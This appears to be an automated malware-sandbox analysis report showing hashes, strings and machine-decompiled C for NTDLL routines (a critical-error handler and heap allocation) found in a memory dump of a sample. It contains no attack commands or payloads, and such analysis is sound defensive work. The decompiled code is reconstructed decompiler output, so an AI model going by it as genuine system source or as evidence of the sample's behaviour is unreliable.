                                                                              • Instruction ID: 05ee359e59edea01c0331ec6b5a0512e30058dc9c025b009aa41010ce19d201f
                                                                              • Opcode Fuzzy Hash: a1bf2363467fac875a2d769b14903c6a2c0d2c296b7e5370015493d739a86319
                                                                              • Instruction Fuzzy Hash: CD11C4357C47028BFB257E1DC890736F695FB96624FA5467AE562CB391DB74C8408340
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01818DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 71%
                                                                              			E01818DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1840d50);
				E017BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E017F5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L017BDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L017BDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E017BD130(_t34, _t39, _t40);
			}





                                                                              0x01818df1
                                                                              0x01818df1
                                                                              0x01818df1
                                                                              0x01818df1
                                                                              0x01818df1
                                                                              0x01818df1
                                                                              0x01818df3
                                                                              0x01818df8
                                                                              0x01818dfd
                                                                              0x01818e00
                                                                              0x01818e0e
                                                                              0x01818e2a
                                                                              0x01818e36
                                                                              0x01818e38
                                                                              0x01818e3c
                                                                              0x01818e46
                                                                              0x01818e46
                                                                              0x01818e36
                                                                              0x01818e50
                                                                              0x01818e56
                                                                              0x01818e59
                                                                              0x01818e5c
                                                                              0x01818e60
                                                                              0x01818e67
                                                                              0x01818e6d
                                                                              0x01818e73
                                                                              0x01818e74
                                                                              0x01818eb1
                                                                              0x01818ebd

                                                                              Strings
                                                                              • Critical error detected %lx, xrefs: 01818E21
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Critical error detected %lx
                                                                              • API String ID: 0-802127002
                                                                              • Opcode ID: c4c3f85892d9bf4cbdb741ffcafbc640377cbc0bdf43ef8a23c27f288c72c943
                                                                              • Instruction ID: f7778787d77efb50f31a6ea71a20bc56c1f08ecaedac5141a7a78469bd118572
                                                                              • Opcode Fuzzy Hash: c4c3f85892d9bf4cbdb741ffcafbc640377cbc0bdf43ef8a23c27f288c72c943
                                                                              • Instruction Fuzzy Hash: 6F117972D04348DBDB24CFA8C54A7DDFBB4AB05318F20422DE568AB386C3740602CF14
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017FFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 017FFF60
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                              • API String ID: 0-1911121157
                                                                              • Opcode ID: 7afbfad4364e1adb5f3af1619b4ed40b9255b2b00b7913d426076f2f3a006201
                                                                              • Instruction ID: 37d04f3804e50fa9d009aebf56e8b8f410a368b1c19551bf98c818b436489202
                                                                              • Opcode Fuzzy Hash: 7afbfad4364e1adb5f3af1619b4ed40b9255b2b00b7913d426076f2f3a006201
                                                                              • Instruction Fuzzy Hash: 2311A172950248EFDB26DB54C988FD9FBB1FB18718F148058E608A7261CB799A44CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01835BA5 Relevance: .6, Instructions: 592COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 88%
                                                                              			E01835BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1841178);
				E017BD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01834C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E017AD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01835542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x18560e8;
								if( *0x18560e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x18560e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E017A9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E017A6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E017AF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E017AF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E017AF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E017AFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E017AFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E017AF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E017AF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01834CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E017BD130(_t427, _t494, _t511);
				}
			}










































































                                                                              0x01835ba5
                                                                              0x01835baa
                                                                              0x01835baf
                                                                              0x01835bb4
                                                                              0x01835bb6
                                                                              0x01835bbc
                                                                              0x01835bbe
                                                                              0x01835bc4
                                                                              0x01835bcd
                                                                              0x01835bd3
                                                                              0x01835bd6
                                                                              0x01835bdc
                                                                              0x01835be0
                                                                              0x01835be3
                                                                              0x01835beb
                                                                              0x01835bf2
                                                                              0x01835bf8
                                                                              0x01835bfe
                                                                              0x01835c04
                                                                              0x01835c0e
                                                                              0x01835c18
                                                                              0x01835c1f
                                                                              0x01835c25
                                                                              0x01835c2a
                                                                              0x01835c2c
                                                                              0x01835c32
                                                                              0x01835c3a
                                                                              0x01835c3f
                                                                              0x01835c42
                                                                              0x01835c48
                                                                              0x01835c5b
                                                                              0x01835c5b
                                                                              0x01835c2c
                                                                              0x01835cb7
                                                                              0x01835cb9
                                                                              0x01835cbf
                                                                              0x01835cc2
                                                                              0x01835cca
                                                                              0x01835ccb
                                                                              0x01835ccb
                                                                              0x01835cd1
                                                                              0x01835cd7
                                                                              0x01835cda
                                                                              0x01835ce1
                                                                              0x01835ce4
                                                                              0x01835ce7
                                                                              0x01835ced
                                                                              0x01835cf3
                                                                              0x01835cf9
                                                                              0x01835cff
                                                                              0x01835d08
                                                                              0x01835d0a
                                                                              0x01835d0e
                                                                              0x01835d10
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01835d16
                                                                              0x01835d1a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01835d20
                                                                              0x01835d22
                                                                              0x01835d25
                                                                              0x01835d2f
                                                                              0x01835d2f
                                                                              0x01835d33
                                                                              0x01835d3d
                                                                              0x01835d49
                                                                              0x01835d4b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01835d5a
                                                                              0x01835d5d
                                                                              0x01835d60
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01835d66
                                                                              0x01835d69
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01835d6f
                                                                              0x01835d6f
                                                                              0x01835d73
                                                                              0x01835d79
                                                                              0x01835d7f
                                                                              0x01835d86
                                                                              0x01835d95
                                                                              0x01835d98
                                                                              0x01835dba
                                                                              0x01835dcb
                                                                              0x01835dce
                                                                              0x01835dd3
                                                                              0x01835dd6
                                                                              0x01835dd8
                                                                              0x01835de6
                                                                              0x01835dec
                                                                              0x01835dee
                                                                              0x01835df1
                                                                              0x01835df3
                                                                              0x0183635a
                                                                              0x0183635a
                                                                              0x00000000
                                                                              0x0183635a
                                                                              0x01835dfe
                                                                              0x01835e02
                                                                              0x01835e05
                                                                              0x01835e07
                                                                              0x01835e10
                                                                              0x01835e13
                                                                              0x01835e1b
                                                                              0x01835e1c
                                                                              0x01835e21
                                                                              0x01835e22
                                                                              0x01835e23
                                                                              0x01835e25
                                                                              0x01835e2a
                                                                              0x01835e2c
                                                                              0x01835e2e
                                                                              0x01835e36
                                                                              0x01835e39
                                                                              0x01835e42
                                                                              0x01835e47
                                                                              0x01835e4d
                                                                              0x01835e54
                                                                              0x01835e54
                                                                              0x01835e54
                                                                              0x01835e2e
                                                                              0x01835e5c
                                                                              0x01835e5f
                                                                              0x01835e62
                                                                              0x01835e64
                                                                              0x01835e6b
                                                                              0x01835e70
                                                                              0x01835e7a
                                                                              0x01835e7a
                                                                              0x01835e7a
                                                                              0x01835e6b
                                                                              0x01835e7e
                                                                              0x01835e7f
                                                                              0x01835e7f
                                                                              0x01835e81
                                                                              0x01835e87
                                                                              0x01835e8b
                                                                              0x01835e8c
                                                                              0x01835e8c
                                                                              0x01835e8c
                                                                              0x01835e9a
                                                                              0x01835e9c
                                                                              0x01835ea2
                                                                              0x01835ea6
                                                                              0x01835f50
                                                                              0x01835f50
                                                                              0x01835f57
                                                                              0x01835f66
                                                                              0x01835f66
                                                                              0x01835f66
                                                                              0x01835f68
                                                                              0x01835f6a
                                                                              0x018363d0
                                                                              0x00000000
                                                                              0x01835f70
                                                                              0x01835f70
                                                                              0x01835f91
                                                                              0x01835f9c
                                                                              0x01835f9e
                                                                              0x01835fa4
                                                                              0x01835fa6
                                                                              0x0183638c
                                                                              0x01836392
                                                                              0x018363a1
                                                                              0x018363a7
                                                                              0x018363af
                                                                              0x018363af
                                                                              0x018363bd
                                                                              0x018363d8
                                                                              0x00000000
                                                                              0x018363d8
                                                                              0x01835fac
                                                                              0x01835fb2
                                                                              0x01835fb4
                                                                              0x01835fbd
                                                                              0x01835fc6
                                                                              0x01835fce
                                                                              0x01835fd4
                                                                              0x01835fdc
                                                                              0x01835fec
                                                                              0x01835fed
                                                                              0x01835fee
                                                                              0x01835fef
                                                                              0x01835ff9
                                                                              0x01835ffa
                                                                              0x01835ffb
                                                                              0x01835ffc
                                                                              0x01836000
                                                                              0x01836004
                                                                              0x01836012
                                                                              0x01836012
                                                                              0x01836018
                                                                              0x01836019
                                                                              0x0183601a
                                                                              0x0183601b
                                                                              0x0183601c
                                                                              0x01836020
